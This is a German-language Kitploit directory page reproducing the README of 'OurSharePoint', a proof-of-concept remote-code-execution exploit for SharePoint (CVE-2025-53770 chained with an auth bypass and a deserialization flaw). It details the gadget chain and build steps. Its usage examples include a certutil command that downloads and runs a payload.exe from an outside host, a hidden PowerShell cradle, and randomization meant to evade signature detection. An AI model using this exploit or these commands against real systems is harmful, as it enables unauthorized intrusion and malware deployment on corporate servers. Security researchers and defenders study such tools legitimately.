Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
OurSharePoint-CVE-2025-53770 — Glaubst du wirklich, dass SharePoint sicher ist? | Kitploit
Tools/GitHubGitHub/rabbitbong/oursharepoint-cve-2025-53770
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlRed Teaming
GitHubrabbitbong/oursharepoint-cve-2025-53770

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

OurSharePoint-CVE-2025-53770

Glaubst du wirklich, dass SharePoint sicher ist?

Repository anzeigen
21vor 5 MonatenNoch nicht geprüft

OurSharepoint — CVE-2025-53770 PoC

Eigenständiges, einzelnes SharePoint-RCE-Tool. Erzeugt eine TypeConfuseDelegate-Gadget-Kette als rohe MS-NRBF-Byte (ohne ysoserial.exe), verpackt sie in einen DataSet-Deserialisierungs-Payload und liefert diesen über HTTP unter Verwendung der Authentifizierungsbypass — alles in einem Schritt.


Exploit-Kette

SchrittCVEBeschreibung
1CVE-2025-49706Auth-Bypass – Referer: /_layouts/SignOut.aspx umgeht die SharePoint-Authentifizierung
2CVE-2025-53771Patch-Bypass – ein nachgestelltes Pfadsegment nach ToolPane.aspx umgeht die Juli-2025-Korrektur
3CVE-2025-49704Deserialisierung – ExcelDataSet.CompressedDataTable löst BinaryFormatter auf einem manipulierten DataSet aus
4—Das DataSet-Schema erzwingt LosFormatter.Deserialize() auf dem inneren Payload über ExpandedWrapper + ObjectDataProvider
5—TypeConfuseDelegate – Der Comparer von SortedSet<string> ist Process.Start(string, string), der cmd /c <command> ausführt

Der gesamte binäre Stream (sowohl der äußere DataSet-Wrapper als auch die innere TypeConfuseDelegate-Gadget) wird als rohe MS-NRBF-Datensätze konstruiert – es wird keine .NET-Laufzeitserialisierung verwendet. Dies entspricht dem Format, das vom Metasploit-Modul Byte für Byte erzeugt wird.


Build

Erfordert .NET Framework 4.8 SDK (Visual Studio 2022 oder eigenständige Build-Tools):

root@kitploit:~
& "C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe" OurSharePoint.sln /p:Configuration=Release

Ausgabe: OurSharePoint\bin\Release\OurSharePoint.exe (Einzeldatei, keine Abhängigkeiten)


Verwendung

Ein-Schritt: Bereitstellen und ausführen

root@kitploit:~
OurSharePoint.exe --cmd="certutil -urlcache -split -f http://10.0.0.5/payload.exe C:\Windows\Temp\p.exe & C:\Windows\Temp\p.exe" --target=https://sp.corp.com

Einfache Befehlsausführung

root@kitploit:~
OurSharePoint.exe --cmd="whoami > C:\Windows\Temp\pwned.txt" --target=https://sp.corp.com

PowerShell-Cradle

root@kitploit:~
OurSharePoint.exe --cmd="powershell -nop -w hidden -enc <base64>" --target=https://sp.corp.com

Nur Aufklärung (kein Payload)

root@kitploit:~
OurSharePoint.exe --target=https://sp.corp.com --check

Payload-Dateien offline erstellen

root@kitploit:~
OurSharePoint.exe --cmd="calc.exe" --out=exploit

Mit Proxy (Burp)

root@kitploit:~
OurSharePoint.exe --cmd="whoami" --target=https://sp.corp.com --proxy=http://127.0.0.1:8080

Legacy: Externer ysoserial.exe-Payload

root@kitploit:~
ysoserial.exe -f LosFormatter -g TypeConfuseDelegate -o base64 -c "cmd /c calc.exe" > gadget.b64
OurSharePoint.exe --in=gadget.b64 --target=https://sp.corp.com

Optionen


Ausgabedateien

Wenn --out verwendet wird, schreibt das Tool:

DateiInhalt
<prefix>.binRoher BinaryFormatter-DataSet-Stream
<prefix>.b64GZip + Base64-kodiert (was in CompressedDataTable eingefügt wird)

Betroffene Versionen

EditionVerwundbarer Bereich
SharePoint Server Subscription Edition16.0.14326.20450 – 16.0.18526.20424
SharePoint Server 201916.0.10337.12109 – 16.0.10417.20027
SharePoint Enterprise Server 201616.0.4351.1000 – 16.0.5508.1000
SharePoint Server 201315.0.4481.1005 – 15.0.5545.1000

Implementierungshinweise

  • Keine Laufzeitserialisierung – Sowohl der DataSet-Wrapper als auch die TypeConfuseDelegate-Gadget werden als rohe MS-NRBF-Binärdatensätze mit BinaryWriter geschrieben. Dies vermeidet Unterschiede zwischen der Ausgabe der .NET-Laufzeitserialisierung und dem, was der Ziel-Deserialisierer erwartet.
  • LosFormatter-Rahmung – Die innere Gadget wird mit ObjectStateFormatter-Header-Bytes (0xFF 0x01 0x32 + 7-Bit-Länge) umschlossen, anstatt LosFormatter.Serialize() zu verwenden.
  • Einzelne Binärdatei – Keine externen Tools, DLLs oder Python-Skripte erforderlich. Die .exe ist vollständig eigenständig.
  • Randomisierung – XML-Tag-Präfixe und DataSet-Elementnamen werden pro Ausführung randomisiert, um Signaturerkennung zu vermeiden.

Referenzen

  • Eye Security — SharePoint Under Siege
  • Metasploit PR #20409 — sharepoint_toolpane_rce
  • MS-NRBF Spezifikation
  • pwntester/ysoserial.net — TypeConfuseDelegate
Tool herunterladen
FlagBeschreibungStandard
--cmd=COMMANDAuszuführender Befehl (wird als cmd /c COMMAND ausgeführt)—
--in=FILEVorgefertigte Base64-LosFormatter-Payload-Datei—
--target=URLSharePoint-Basis-URL für HTTP-Zustellung—
--checkNur Version identifizieren, kein Payload—
--out=PREFIXAusgabedatei-Präfixpayload
--sp-version=VERLayouts-Pfad-Version (15 oder 16)15
--proxy=URLHTTP-Proxy—
--ua=STRINGBenutzerdefinierter User-AgentFirefox 120
--referer=URLÜberschreibt den Auth-Bypass-Refererautomatisch
--timeout=SECHTTP-Timeout15
--a/b/c=NAMEDataSet-/Element-/Spaltennamenzufällig